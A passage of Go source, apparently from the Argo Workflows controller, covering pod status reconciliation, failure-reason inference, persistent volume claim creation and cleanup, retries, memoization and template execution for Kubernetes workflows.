// node is not a pod, it is already complete, or it can be re-run.
continue
}
if seenPod, ok := seenPods[nodeID]; !ok {
// grace-period to allow informer sync
recentlyStarted := recentlyStarted(node)
woc.log.WithFields(log.Fields{"podName": node.Name, "nodePhase": node.Phase, "recentlyStarted": recentlyStarted}).Info("Workflow pod is missing")
metrics.PodMissingMetric.WithLabelValues(strconv.FormatBool(recentlyStarted), string(node.Phase)).Inc()
// If the node is pending and the pod does not exist, it could be the case that we want to try to submit it
// again instead of marking it as an error. Check if that's the case.
if node.Pending() {
continue
}
if recentlyStarted {
// If the pod was deleted, then it is possible that the controller never gets another informer message about it.
// In this case, the workflow will only be requeued after the resync period (20m). This means the
// workflow will not update for 20m. Requeuing here prevents that from happening.
woc.requeue()
continue
}
if node.Daemoned != nil && *node.Daemoned {
node.Daemoned = nil
woc.updated = true
}
woc.markNodePhase(node.Name, wfv1.NodeError, "pod deleted")
} else {
// At this point we are certain that the pod associated with our node is running or has been run;
// it is safe to extract the k8s-node information given this knowledge.
if node.HostNodeName != seenPod.Spec.NodeName {
node.HostNodeName = seenPod.Spec.NodeName
woc.wf.Status.Nodes[nodeID] = node
woc.updated = true
}
}
}
return nil
}
func recentlyStarted(node wfv1.NodeStatus) bool {
return time.Since(node.StartedAt.Time) <= envutil.LookupEnvDurationOr("RECENTLY_STARTED_POD_DURATION", 10*time.Second)
}
// shouldPrintPodSpec returns whether the pod spec should be printed to the log
func (woc *wfOperationCtx) shouldPrintPodSpec(node wfv1.NodeStatus) bool {
return woc.controller.Config.PodSpecLogStrategy.AllPods ||
(woc.controller.Config.PodSpecLogStrategy.FailedPod && node.FailedOrError())
}
// fails any suspended and pending nodes if the workflow deadline has passed
func (woc *wfOperationCtx) failSuspendedAndPendingNodesAfterDeadlineOrShutdown() {
deadlineExceeded := woc.workflowDeadline != nil && time.Now().UTC().After(*woc.workflowDeadline)
if woc.GetShutdownStrategy().Enabled() || deadlineExceeded {
for _, node := range woc.wf.Status.Nodes {
if node.IsActiveSuspendNode() || (node.Phase == wfv1.NodePending && deadlineExceeded) {
var message string
if woc.GetShutdownStrategy().Enabled() {
message = fmt.Sprintf("Stopped with strategy '%s'", woc.GetShutdownStrategy())
} else {
message = "Step exceeded its deadline"
}
woc.markNodePhase(node.Name, wfv1.NodeFailed, message)
}
}
}
}
// getAllWorkflowPods returns all pods related to the current workflow
func (woc *wfOperationCtx) getAllWorkflowPods() ([]*apiv1.Pod, error) {
objs, err := woc.controller.podInformer.GetIndexer().ByIndex(indexes.WorkflowIndex, indexes.WorkflowIndexValue(woc.wf.Namespace, woc.wf.Name))
if err != nil {
return nil, err
}
pods := make([]*apiv1.Pod, len(objs))
for i, obj := range objs {
pod, ok := obj.(*apiv1.Pod)
if !ok {
return nil, fmt.Errorf("expected \"*apiv1.Pod\", got \"%v\"", reflect.TypeOf(obj).String())
}
pods[i] = pod
}
return pods, nil
}
func printPodSpecLog(pod *apiv1.Pod, wfName string) {
podSpecByte, err := json.Marshal(pod)
if err != nil {
log.WithField("workflow", wfName).WithField("nodename", pod.Name).WithField("namespace", pod.Namespace).Warnf("Unable to mashal pod spec. %v", err)
}
log.WithField("workflow", wfName).WithField("nodename", pod.Name).WithField("namespace", pod.Namespace).Infof("Pod Spec: %s", string(podSpecByte))
}
// assessNodeStatus compares the current state of a pod with its corresponding node
// and returns the new node status if something changed
func (woc *wfOperationCtx) assessNodeStatus(pod *apiv1.Pod, node *wfv1.NodeStatus) *wfv1.NodeStatus {
var newPhase wfv1.NodePhase
var newDaemonStatus *bool
var message string
updated := false
switch pod.Status.Phase {
case apiv1.PodPending:
newPhase = wfv1.NodePending
newDaemonStatus = pointer.BoolPtr(false)
message = getPendingReason(pod)
case apiv1.PodSucceeded:
newPhase = wfv1.NodeSucceeded
newDaemonStatus = pointer.BoolPtr(false)
case apiv1.PodFailed:
// ignore pod failure for daemoned steps
if node.IsDaemoned() {
newPhase = wfv1.NodeSucceeded
} else {
newPhase, message = woc.inferFailedReason(pod)
woc.log.WithField("displayName", node.DisplayName).WithField("templateName", node.TemplateName).
WithField("pod", pod.Name).Infof("Pod failed: %s", message)
}
newDaemonStatus = pointer.BoolPtr(false)
case apiv1.PodRunning:
newPhase = wfv1.NodeRunning
tmplStr, ok := pod.Annotations[common.AnnotationKeyTemplate]
if !ok {
woc.log.WithField("pod", pod.ObjectMeta.Name).Warn("missing template annotation")
return nil
}
var tmpl wfv1.Template
err := json.Unmarshal([]byte(tmplStr), &tmpl)
if err != nil {
woc.log.WithError(err).WithField("pod", pod.ObjectMeta.Name).Warn("template annotation unreadable")
return nil
}
if tmpl.Daemon != nil && *tmpl.Daemon {
// pod is running and template is marked daemon. check if everything is ready
for _, ctrStatus := range pod.Status.ContainerStatuses {
if !ctrStatus.Ready {
return nil
}
}
// proceed to mark node status as running (and daemoned)
newPhase = wfv1.NodeRunning
newDaemonStatus = pointer.BoolPtr(true)
woc.log.Infof("Processing ready daemon pod: %v", pod.ObjectMeta.SelfLink)
}
woc.cleanUpPod(pod, tmpl)
default:
newPhase = wfv1.NodeError
message = fmt.Sprintf("Unexpected pod phase for %s: %s", pod.ObjectMeta.Name, pod.Status.Phase)
woc.log.WithField("displayName", node.DisplayName).WithField("templateName", node.TemplateName).
WithField("pod", pod.Name).Error(message)
}
for _, c := range pod.Status.ContainerStatuses {
ctrNodeName := fmt.Sprintf("%s.%s", node.Name, c.Name)
if woc.wf.GetNodeByName(ctrNodeName) == nil {
continue
}
switch {
case c.State.Waiting != nil:
woc.markNodePhase(ctrNodeName, wfv1.NodePending)
case c.State.Running != nil:
woc.markNodePhase(ctrNodeName, wfv1.NodeRunning)
case c.State.Terminated != nil:
exitCode := int(c.State.Terminated.ExitCode)
message := fmt.Sprintf("%s (exit code %d): %s", c.State.Terminated.Reason, exitCode, c.State.Terminated.Message)
switch exitCode {
case 0:
woc.markNodePhase(ctrNodeName, wfv1.NodeSucceeded)
case 64:
// special emissary exit code indicating that the emissary errored, rather than the sub-process failing,
// (unless the sub-process coincidentally exits with code 64 of course)
woc.markNodePhase(ctrNodeName, wfv1.NodeError, message)
default:
woc.markNodePhase(ctrNodeName, wfv1.NodeFailed, message)
}
}
}
if newDaemonStatus != nil {
if !*newDaemonStatus {
// if the daemon status switched to false, we prefer to just unset daemoned status field
// (as opposed to setting it to false)
newDaemonStatus = nil
}
if (newDaemonStatus != nil && node.Daemoned == nil) || (newDaemonStatus == nil && node.Daemoned != nil) {
woc.log.Infof("Setting node %v daemoned: %v -> %v", node.ID, node.Daemoned, newDaemonStatus)
node.Daemoned = newDaemonStatus
updated = true
if pod.Status.PodIP != "" && pod.Status.PodIP != node.PodIP {
// only update Pod IP for daemoned nodes to reduce number of updates
woc.log.Infof("Updating daemon node %s IP %s -> %s", node.ID, node.PodIP, pod.Status.PodIP)
node.PodIP = pod.Status.PodIP
}
}
}
// we only need to update these values if the container transitions to complete
if !node.Phase.Fulfilled() && newPhase.Fulfilled() {
// outputs are mixed between the annotation (parameters, artifacts, and result) and the pod's status (exit code)
if exitCode := getExitCode(pod); exitCode != nil {
woc.log.Infof("Updating node %s exit code %d", node.ID, *exitCode)
node.Outputs = &wfv1.Outputs{ExitCode: pointer.StringPtr(fmt.Sprintf("%d", int(*exitCode)))}
if outputStr, ok := pod.Annotations[common.AnnotationKeyOutputs]; ok {
woc.log.Infof("Setting node %v outputs: %s", node.ID, outputStr)
if err := json.Unmarshal([]byte(outputStr), node.Outputs); err != nil { // I don't expect an error to ever happen in production
node.Phase = wfv1.NodeError
node.Message = err.Error()
}
}
}
}
if node.Phase != newPhase {
woc.log.Infof("Updating node %s status %s -> %s", node.ID, node.Phase, newPhase)
// if we are transitioning from Pending to a different state, clear out pending message
if node.Phase == wfv1.NodePending {
node.Message = ""
}
updated = true
node.Phase = newPhase
}
if message != "" && node.Message != message {
woc.log.Infof("Updating node %s message: %s", node.ID, message)
updated = true
node.Message = message
}
if node.Fulfilled() && node.FinishedAt.IsZero() {
updated = true
if !node.IsDaemoned() {
node.FinishedAt = getLatestFinishedAt(pod)
}
if node.FinishedAt.IsZero() {
// If we get here, the container is daemoned so the
// finishedAt might not have been set.
node.FinishedAt = metav1.Time{Time: time.Now().UTC()}
}
node.ResourcesDuration = resource.DurationForPod(pod)
}
if updated {
return node
}
return nil
}
func getExitCode(pod *apiv1.Pod) *int32 {
for _, c := range pod.Status.ContainerStatuses {
if c.Name == common.MainContainerName && c.State.Terminated != nil {
return pointer.Int32Ptr(c.State.Terminated.ExitCode)
}
}
return nil
}
func podHasContainerNeedingTermination(pod *apiv1.Pod, tmpl wfv1.Template) bool {
for _, c := range pod.Status.ContainerStatuses {
// Only clean up pod when both the wait and the main containers are terminated
if c.Name == common.WaitContainerName || tmpl.IsMainContainerName(c.Name) {
if c.State.Terminated == nil {
return false
}
}
}
return true
}
func (woc *wfOperationCtx) cleanUpPod(pod *apiv1.Pod, tmpl wfv1.Template) {
if podHasContainerNeedingTermination(pod, tmpl) {
woc.controller.queuePodForCleanup(woc.wf.Namespace, pod.Name, terminateContainers)
}
}
// getLatestFinishedAt returns the latest finishedAt timestamp from all the
// containers of this pod.
func getLatestFinishedAt(pod *apiv1.Pod) metav1.Time {
var latest metav1.Time
for _, ctr := range pod.Status.InitContainerStatuses {
if ctr.State.Terminated != nil && ctr.State.Terminated.FinishedAt.After(latest.Time) {
latest = ctr.State.Terminated.FinishedAt
}
}
for _, ctr := range pod.Status.ContainerStatuses {
if ctr.State.Terminated != nil && ctr.State.Terminated.FinishedAt.After(latest.Time) {
latest = ctr.State.Terminated.FinishedAt
}
}
return latest
}
func getPendingReason(pod *apiv1.Pod) string {
for _, ctrStatus := range pod.Status.ContainerStatuses {
if ctrStatus.State.Waiting != nil {
if ctrStatus.State.Waiting.Message != "" {
return fmt.Sprintf("%s: %s", ctrStatus.State.Waiting.Reason, ctrStatus.State.Waiting.Message)
}
return ctrStatus.State.Waiting.Reason
}
}
// Example:
// - lastProbeTime: null
// lastTransitionTime: 2018-08-29T06:38:36Z
// message: '0/3 nodes are available: 2 Insufficient cpu, 3 MatchNodeSelector.'
// reason: Unschedulable
// status: "False"
// type: PodScheduled
for _, cond := range pod.Status.Conditions {
if cond.Reason == apiv1.PodReasonUnschedulable {
if cond.Message != "" {
return fmt.Sprintf("%s: %s", cond.Reason, cond.Message)
}
return cond.Reason
}
}
return ""
}
// inferFailedReason returns metadata about a Failed pod to be used in its NodeStatus
// Returns a tuple of the new phase and message
func (woc *wfOperationCtx) inferFailedReason(pod *apiv1.Pod) (wfv1.NodePhase, string) {
if pod.Status.Message != "" {
// Pod has a nice error message. Use that.
return wfv1.NodeFailed, pod.Status.Message
}
tmpl := woc.findTemplate(pod)
// We only get one message to set for the overall node status.
// If multiple containers failed, in order of preference:
// init, main (annotated), main (exit code), wait, sidecars
order := func(n string) int {
switch {
case n == common.InitContainerName:
return 0
case tmpl.IsMainContainerName(n):
return 1
case n == common.WaitContainerName:
return 2
default:
return 3
}
}
ctrs := append(pod.Status.InitContainerStatuses, pod.Status.ContainerStatuses...)
sort.Slice(ctrs, func(i, j int) bool { return order(ctrs[i].Name) < order(ctrs[j].Name) })
for _, ctr := range ctrs {
// A Virtual Kubelet environment will not set the terminated state on a waiting container
// https://github.com/argoproj/argo-workflows/issues/3879
// https://github.com/virtual-kubelet/virtual-kubelet/blob/7f2a02291530d2df14905702e6d51500dd57640a/node/sync.go#L195-L208
if ctr.State.Waiting != nil {
return wfv1.NodeError, fmt.Sprintf("Pod failed before %s container starts", ctr.Name)
}
t := ctr.State.Terminated
if t == nil {
// We should never get here
log.Warnf("Pod %s phase was Failed but %s did not have terminated state", pod.Name, ctr.Name)
continue
}
if t.ExitCode == 0 {
continue
}
msg := fmt.Sprintf("%s (exit code %d)", t.Reason, t.ExitCode)
if t.Message != "" {
msg = fmt.Sprintf("%s: %s", msg, t.Message)
}
switch {
case ctr.Name == common.InitContainerName:
return wfv1.NodeError, msg
case tmpl.IsMainContainerName(ctr.Name):
return wfv1.NodeFailed, msg
case ctr.Name == common.WaitContainerName:
return wfv1.NodeError, msg
default:
if t.ExitCode == 137 || t.ExitCode == 143 {
// if the sidecar was SIGKILL'd (exit code 137), assume it was because argoexec
// forcibly killed the container, in which case we ignore the error.
// Java exit code 143 is a normal exit: 128 + 15 (SIGTERM) https://github.com/elastic/elasticsearch/issues/31847
log.Infof("Ignoring %d exit code of container '%s'", t.ExitCode, ctr.Name)
} else {
return wfv1.NodeFailed, msg
}
}
}
// If we get here, we have detected that the main/wait containers succeeded but the sidecar(s)
// were SIGKILL'd. The executor may have had to forcefully terminate the sidecar (kill -9),
// resulting in a 137 exit code (which we ignored above). In that case we return Success
// instead of Failure.
return wfv1.NodeSucceeded, ""
}
func (woc *wfOperationCtx) createPVCs(ctx context.Context) error {
if !(woc.wf.Status.Phase == wfv1.WorkflowPending || woc.wf.Status.Phase == wfv1.WorkflowRunning) {
// Only attempt to create PVCs if workflow is in Pending or Running state
// (e.g. passed validation, or didn't already complete)
return nil
}
if len(woc.execWf.Spec.VolumeClaimTemplates) == len(woc.wf.Status.PersistentVolumeClaims) {
// If we have already created the PVCs, then there is nothing to do.
// This will also handle the case where workflow has no volumeClaimTemplates.
return nil
}
pvcClient := woc.controller.kubeclientset.CoreV1().PersistentVolumeClaims(woc.wf.ObjectMeta.Namespace)
for i, pvcTmpl := range woc.execWf.Spec.VolumeClaimTemplates {
if pvcTmpl.ObjectMeta.Name == "" {
return errors.Errorf(errors.CodeBadRequest, "volumeClaimTemplates[%d].metadata.name is required", i)
}
pvcTmpl = *pvcTmpl.DeepCopy()
// PVC name will be <workflowname>-<volumeclaimtemplatename>
refName := pvcTmpl.ObjectMeta.Name
pvcName := fmt.Sprintf("%s-%s", woc.wf.ObjectMeta.Name, pvcTmpl.ObjectMeta.Name)
woc.log.Infof("Creating pvc %s", pvcName)
pvcTmpl.ObjectMeta.Name = pvcName
if pvcTmpl.ObjectMeta.Labels == nil {
pvcTmpl.ObjectMeta.Labels = make(map[string]string)
}
pvcTmpl.ObjectMeta.Labels[common.LabelKeyWorkflow] = woc.wf.ObjectMeta.Name
pvcTmpl.OwnerReferences = []metav1.OwnerReference{
*metav1.NewControllerRef(woc.wf, wfv1.SchemeGroupVersion.WithKind(workflow.WorkflowKind)),
}
pvc, err := pvcClient.Create(ctx, &pvcTmpl, metav1.CreateOptions{})
if err != nil && apierr.IsAlreadyExists(err) {
woc.log.WithField("pvc", pvcTmpl.Name).Info("pvc already exists. Workflow is re-using it")
pvc, err = pvcClient.Get(ctx, pvcTmpl.Name, metav1.GetOptions{})
if err != nil {
return err
}
hasOwnerReference := false
for i := range pvc.OwnerReferences {
ownerRef := pvc.OwnerReferences[i]
if ownerRef.UID == woc.wf.UID {
hasOwnerReference = true
break
}
}
if !hasOwnerReference {
return errors.Errorf(errors.CodeForbidden, "%s pvc already exists with different ownerreference", pvcTmpl.Name)
}
}
// continue
if err != nil {
return err
}
vol := apiv1.Volume{
Name: refName,
VolumeSource: apiv1.VolumeSource{
PersistentVolumeClaim: &apiv1.PersistentVolumeClaimVolumeSource{
ClaimName: pvc.ObjectMeta.Name,
},
},
}
woc.wf.Status.PersistentVolumeClaims = append(woc.wf.Status.PersistentVolumeClaims, vol)
woc.updated = true
}
return nil
}
func (woc *wfOperationCtx) deletePVCs(ctx context.Context) error {
gcStrategy := woc.wf.Spec.GetVolumeClaimGC().GetStrategy()
switch gcStrategy {
case wfv1.VolumeClaimGCOnSuccess:
if woc.wf.Status.Phase == wfv1.WorkflowError || woc.wf.Status.Phase == wfv1.WorkflowFailed {
// Skip deleting PVCs to reuse them for retried failed/error workflows.
// PVCs are automatically deleted when the corresponding owner workflows get deleted.
return nil
}
case wfv1.VolumeClaimGCOnCompletion:
default:
return fmt.Errorf("unknown volume gc strategy: %s", gcStrategy)
}
totalPVCs := len(woc.wf.Status.PersistentVolumeClaims)
if totalPVCs == 0 {
// PVC list already empty. nothing to do
return nil
}
pvcClient := woc.controller.kubeclientset.CoreV1().PersistentVolumeClaims(woc.wf.ObjectMeta.Namespace)
newPVClist := make([]apiv1.Volume, 0)
// Attempt to delete all PVCs. Record first error encountered
var firstErr error
for _, pvc := range woc.wf.Status.PersistentVolumeClaims {
woc.log.Infof("Deleting PVC %s", pvc.PersistentVolumeClaim.ClaimName)
err := pvcClient.Delete(ctx, pvc.PersistentVolumeClaim.ClaimName, metav1.DeleteOptions{})
if err != nil {
if !apierr.IsNotFound(err) {
woc.log.Errorf("Failed to delete pvc %s: %v", pvc.PersistentVolumeClaim.ClaimName, err)
newPVClist = append(newPVClist, pvc)
if firstErr == nil {
firstErr = err
}
}
}
}
if len(newPVClist) != totalPVCs {
// we were successful in deleting one or more PVCs
woc.log.Infof("Deleted %d/%d PVCs", totalPVCs-len(newPVClist), totalPVCs)
woc.wf.Status.PersistentVolumeClaims = newPVClist
woc.updated = true
}
return firstErr
}
func getChildNodeIndex(node *wfv1.NodeStatus, nodes wfv1.Nodes, index int) *wfv1.NodeStatus {
if len(node.Children) <= 0 {
return nil
}
nodeIndex := index
if index < 0 {
nodeIndex = len(node.Children) + index // This actually subtracts, since index is negative
if nodeIndex < 0 {
panic(fmt.Sprintf("child index '%d' out of bounds", index))
}
}
lastChildNodeName := node.Children[nodeIndex]
lastChildNode, ok := nodes[lastChildNodeName]
if !ok {
panic("could not find child node")
}
return &lastChildNode
}
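// exampleGetChildNodeIndex is an illustrative sketch only (not called by the controller)
// showing how a negative index resolves to the most recently added child; the child IDs
// used as map keys here are assumptions for demonstration purposes.
func exampleGetChildNodeIndex() {
	parent := wfv1.NodeStatus{Children: []string{"node-1", "node-2"}}
	nodes := wfv1.Nodes{
		"node-1": {Name: "retry(0)"},
		"node-2": {Name: "retry(1)"},
	}
	last := getChildNodeIndex(&parent, nodes, -1)
	fmt.Println(last.Name) // retry(1)
}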
type executeTemplateOpts struct {
// boundaryID is an ID for node grouping
boundaryID string
// onExitTemplate signifies that executeTemplate was called as part of an onExit handler.
// Necessary for graceful shutdowns
onExitTemplate bool
// executionDeadline is a deadline to set on any pods executed. This is necessary for pods to inherit backoff.maxDuration
executionDeadline time.Time
}
// executeTemplate executes the template with the given arguments and returns the created NodeStatus
// for the created node (if created). Nodes may not be created if parallelism or deadline exceeded.
// nodeName is the name to be used as the name of the node, and boundaryID indicates which template
// boundary this node belongs to.
func (woc *wfOperationCtx) executeTemplate(ctx context.Context, nodeName string, orgTmpl wfv1.TemplateReferenceHolder, tmplCtx *templateresolution.Context, args wfv1.Arguments, opts *executeTemplateOpts) (*wfv1.NodeStatus, error) {
woc.log.Debugf("Evaluating node %s: template: %s, boundaryID: %s", nodeName, common.GetTemplateHolderString(orgTmpl), opts.boundaryID)
node := woc.wf.GetNodeByName(nodeName)
// Set templateScope from which the template resolution starts.
templateScope := tmplCtx.GetTemplateScope()
newTmplCtx, resolvedTmpl, templateStored, err := tmplCtx.ResolveTemplate(orgTmpl)
if err != nil {
return woc.initializeNodeOrMarkError(node, nodeName, templateScope, orgTmpl, opts.boundaryID, err), err
}
// A new template was stored during resolution, persist it
if templateStored {
woc.updated = true
}
localParams := make(map[string]string)
// Inject the pod name. If the pod has a retry strategy, the pod name will be changed and will be injected when it
// is determined
if resolvedTmpl.IsPodType() && woc.retryStrategy(resolvedTmpl) == nil {
localParams[common.LocalVarPodName] = woc.wf.NodeID(nodeName)
}
// Merge template defaults into the resolved template
err = woc.mergedTemplateDefaultsInto(resolvedTmpl)
if err != nil {
return woc.initializeNodeOrMarkError(node, nodeName, templateScope, orgTmpl, opts.boundaryID, err), err
}
// Inputs have been processed with arguments already, so pass empty arguments.
processedTmpl, err := common.ProcessArgs(resolvedTmpl, &args, woc.globalParams, localParams, false)
if err != nil {
return woc.initializeNodeOrMarkError(node, nodeName, templateScope, orgTmpl, opts.boundaryID, err), err
}
// If memoization is on, check if node output exists in cache
if node == nil && processedTmpl.Memoize != nil {
memoizationCache := woc.controller.cacheFactory.GetCache(controllercache.ConfigMapCache, processedTmpl.Memoize.Cache.ConfigMap.Name)
if memoizationCache == nil {
err := fmt.Errorf("cache could not be found or created")
woc.log.WithFields(log.Fields{"cacheName": processedTmpl.Memoize.Cache.ConfigMap.Name}).WithError(err).Error("Failed to load memoization cache")
return woc.initializeNodeOrMarkError(node, nodeName, templateScope, orgTmpl, opts.boundaryID, err), err
}
entry, err := memoizationCache.Load(ctx, processedTmpl.Memoize.Key)
if err != nil {
return woc.initializeNodeOrMarkError(node, nodeName, templateScope, orgTmpl, opts.boundaryID, err), err
}
hit := entry.Hit()
var outputs *wfv1.Outputs
if processedTmpl.Memoize.MaxAge != "" {
maxAge, err := time.ParseDuration(processedTmpl.Memoize.MaxAge)
if err != nil {
err := fmt.Errorf("invalid maxAge: %s", err)
return woc.initializeNodeOrMarkError(node, nodeName, templateScope, orgTmpl, opts.boundaryID, err), err
}
maxAgeOutputs, ok := entry.GetOutputsWithMaxAge(maxAge)
if !ok {
// The outputs are expired, so this cache entry is not hit
hit = false
}
outputs = maxAgeOutputs
} else {
outputs = entry.GetOutputs()
}
memoizationStatus := &wfv1.MemoizationStatus{
Hit: hit,
Key: processedTmpl.Memoize.Key,
CacheName: processedTmpl.Memoize.Cache.ConfigMap.Name,
}
if hit {
node = woc.initializeCacheHitNode(nodeName, processedTmpl, templateScope, orgTmpl, opts.boundaryID, outputs, memoizationStatus)
} else {
node = woc.initializeCacheNode(nodeName, processedTmpl, templateScope, orgTmpl, opts.boundaryID, memoizationStatus)
}
woc.wf.Status.Nodes[node.ID] = *node
woc.updated = true
}
if node != nil {
if node.Fulfilled() {
woc.controller.syncManager.Release(woc.wf, node.ID, processedTmpl.Synchronization)
woc.log.Debugf("Node %s already completed", nodeName)
if processedTmpl.Metrics != nil {
// Check if this node completed between operator executions. If it did, emit its metrics here.
// If a node completes within the same execution, its metrics are emitted below.
if prevNodeStatus, ok := woc.preExecutionNodePhases[node.ID]; ok && !prevNodeStatus.Fulfilled() {
localScope, realTimeScope := woc.prepareMetricScope(node)
woc.computeMetrics(processedTmpl.Metrics.Prometheus, localScope, realTimeScope, false)
}
}
return node, nil
}
woc.log.Debugf("Executing node %s of %s is %s", nodeName, node.Type, node.Phase)
// Memoized nodes don't have StartedAt.
if node.StartedAt.IsZero() {
node.StartedAt = metav1.Time{Time: time.Now().UTC()}
node.EstimatedDuration = woc.estimateNodeDuration(node.Name)
woc.wf.Status.Nodes[node.ID] = *node
woc.updated = true
}
}
// Check if we took too long operating on this workflow and immediately return if we did
if time.Now().UTC().After(woc.deadline) {
woc.log.Warnf("Deadline exceeded")
woc.requeue()
return node, ErrDeadlineExceeded
}
// Check the template deadline for Pending nodes
// This check covers the resource-forbidden and synchronization scenarios,
// in which the node will only have been created in a Pending state.
_, err = woc.checkTemplateTimeout(processedTmpl, node)
if err != nil {
woc.log.Warnf("Template %s exceeded its deadline", processedTmpl.Name)
return woc.markNodePhase(nodeName, wfv1.NodeFailed, err.Error()), err
}
// Check if we exceeded template or workflow parallelism and immediately return if we did
if err := woc.checkParallelism(processedTmpl, node, opts.boundaryID); err != nil {
return node, err
}
if processedTmpl.Synchronization != nil {
lockAcquired, wfUpdated, msg, err := woc.controller.syncManager.TryAcquire(woc.wf, woc.wf.NodeID(nodeName), processedTmpl.Synchronization)
if err != nil {
return woc.initializeNodeOrMarkError(node, nodeName, templateScope, orgTmpl, opts.boundaryID, err), err
}
if !lockAcquired {
if node == nil {
node = woc.initializeExecutableNode(nodeName, wfutil.GetNodeType(processedTmpl), templateScope, processedTmpl, orgTmpl, opts.boundaryID, wfv1.NodePending, msg)
}
lockName, err := argosync.GetLockName(processedTmpl.Synchronization, woc.wf.Namespace)
if err != nil {
// If an error were to be returned here, it would already have been caught by TryAcquire. If it wasn't,
// then this is unexpected behavior and a bug.
panic("bug: GetLockName should not return an error after a call to TryAcquire")
}
return woc.markNodeWaitingForLock(node.Name, lockName.EncodeName()), nil
} else {
woc.log.Infof("Node %s acquired synchronization lock", nodeName)
if node != nil {
node.Message = ""
node = woc.markNodeWaitingForLock(node.Name, "")
}
}
woc.updated = wfUpdated
}
// If the user has specified retries, node becomes a special retry node.
// This node acts as a parent of all retries that will be done for
// the container. The status of this node should be "Success" if any
// of the retries succeed. Otherwise, it is "Failed".
retryNodeName := ""
if woc.retryStrategy(processedTmpl) != nil {
retryNodeName = nodeName
retryParentNode := node
if retryParentNode == nil {
woc.log.Debugf("Inject a retry node for node %s", retryNodeName)
retryParentNode = woc.initializeExecutableNode(retryNodeName, wfv1.NodeTypeRetry, templateScope, processedTmpl, orgTmpl, opts.boundaryID, wfv1.NodeRunning)
}
processedRetryParentNode, continueExecution, err := woc.processNodeRetries(retryParentNode, *woc.retryStrategy(processedTmpl), opts)
if err != nil {
return woc.markNodeError(retryNodeName, err), err
} else if !continueExecution {
// We are still waiting for a retry delay to finish
return retryParentNode, nil
}
retryParentNode = processedRetryParentNode
// The retry node might have completed by now.
if retryParentNode.Fulfilled() {
if processedTmpl.Metrics != nil {
// In this check, a completed node may or may not have existed prior to this execution. If it did exist, ensure that it wasn't
// completed before this execution. If it did not exist prior, then we can infer that it was completed during this execution.
// The statement "(!ok || !prevNodeStatus.Fulfilled())" checks for this behavior and represents the material conditional
// "ok -> !prevNodeStatus.Fulfilled()" (https://en.wikipedia.org/wiki/Material_conditional)
if prevNodeStatus, ok := woc.preExecutionNodePhases[retryParentNode.ID]; (!ok || !prevNodeStatus.Fulfilled()) && retryParentNode.Fulfilled() {
localScope, realTimeScope := woc.prepareMetricScope(processedRetryParentNode)
woc.computeMetrics(processedTmpl.Metrics.Prometheus, localScope, realTimeScope, false)
}
}
if processedTmpl.Synchronization != nil {
woc.controller.syncManager.Release(woc.wf, node.ID, processedTmpl.Synchronization)
}
return retryParentNode, nil
}
lastChildNode := getChildNodeIndex(retryParentNode, woc.wf.Status.Nodes, -1)
if lastChildNode != nil && !lastChildNode.Fulfilled() {
// Last child node is still running.
nodeName = lastChildNode.Name
node = lastChildNode
} else {
// Create a new child node and append it to the retry node.
nodeName = fmt.Sprintf("%s(%d)", retryNodeName, len(retryParentNode.Children))
woc.addChildNode(retryNodeName, nodeName)
node = nil
// There must already be at least one child (a previous attempt) for retry-on-different-host to apply
if lastChildNode != nil {
RetryOnDifferentHost(woc.wf.NodeID(retryNodeName))(*woc.retryStrategy(processedTmpl), woc.wf.Status.Nodes, processedTmpl)
}
localParams := make(map[string]string)
// Change the `pod.name` variable to the new retry node name
if processedTmpl.IsPodType() {
localParams[common.LocalVarPodName] = woc.wf.NodeID(nodeName)
}
// Inject the retryAttempt number
localParams[common.LocalVarRetries] = strconv.Itoa(len(retryParentNode.Children))
processedTmpl, err = common.SubstituteParams(processedTmpl, map[string]string{}, localParams)
if err != nil {
return woc.initializeNodeOrMarkError(node, nodeName, templateScope, orgTmpl, opts.boundaryID, err), err
}
}
}
switch processedTmpl.GetType() {
case wfv1.TemplateTypeContainer:
node, err = woc.executeContainer(ctx, nodeName, templateScope, processedTmpl, orgTmpl, opts)
case wfv1.TemplateTypeContainerSet:
node, err = woc.executeContainerSet(ctx, nodeName, templateScope, processedTmpl, orgTmpl, opts)
case wfv1.TemplateTypeSteps:
node, err = woc.executeSteps(ctx, nodeName, newTmplCtx, templateScope, processedTmpl, orgTmpl, opts)
case wfv1.TemplateTypeScript:
node, err = woc.executeScript(ctx, nodeName, templateScope, processedTmpl, orgTmpl, opts)
case wfv1.TemplateTypeResource:
node, err = woc.executeResource(ctx, nodeName, templateScope, processedTmpl, orgTmpl, opts)
case wfv1.TemplateTypeDAG:
node, err = woc.executeDAG(ctx, nodeName, newTmplCtx, templateScope, processedTmpl, orgTmpl, opts)
case wfv1.TemplateTypeSuspend:
node, err = woc.executeSuspend(nodeName, templateScope, processedTmpl, orgTmpl, opts)
case wfv1.TemplateTypeData:
node, err = woc.executeData(ctx, nodeName, templateScope, processedTmpl, orgTmpl, opts)
default:
err = errors.Errorf(errors.CodeBadRequest, "Template '%s' missing specification", processedTmpl.Name)
return woc.initializeNode(nodeName, wfv1.NodeTypeSkipped, templateScope, orgTmpl, opts.boundaryID, wfv1.NodeError, err.Error()), err
}
if err != nil {
node = woc.markNodeError(nodeName, err)
woc.controller.syncManager.Release(woc.wf, node.ID, processedTmpl.Synchronization)
// If retry policy is not set, or if it is not set to Always or OnError, we won't attempt to retry an errored container
// and we return instead.
retryStrategy := woc.retryStrategy(processedTmpl)
if retryStrategy == nil ||
(retryStrategy.RetryPolicy != wfv1.RetryPolicyAlways &&
retryStrategy.RetryPolicy != wfv1.RetryPolicyOnError &&
retryStrategy.RetryPolicy != wfv1.RetryPolicyOnTransientError) {
return node, err
}
}
if node.Fulfilled() {
woc.controller.syncManager.Release(woc.wf, node.ID, processedTmpl.Synchronization)
}
if processedTmpl.Metrics != nil {
// Check if the node was just created, if it was emit realtime metrics.
// If the node did not previously exist, we can infer that it was created during the current operation, emit real time metrics.
if _, ok := woc.preExecutionNodePhases[node.ID]; !ok {
localScope, realTimeScope := woc.prepareMetricScope(node)
woc.computeMetrics(processedTmpl.Metrics.Prometheus, localScope, realTimeScope, true)
}
// Check if the node completed during this execution, if it did emit metrics
//
// This check is necessary because sometimes a node will be marked completed during the current execution and will
// not be considered again. The best example of this is the entrypoint steps/dag template (once completed, the
// workflow ends and it's not reconsidered). This check makes sure that its metrics also get emitted.
//
// In this check, a completed node may or may not have existed prior to this execution. If it did exist, ensure that it wasn't
// completed before this execution. If it did not exist prior, then we can infer that it was completed during this execution.
// The statement "(!ok || !prevNodeStatus.Fulfilled())" checks for this behavior and represents the material conditional
// "ok -> !prevNodeStatus.Fulfilled()" (https://en.wikipedia.org/wiki/Material_conditional)
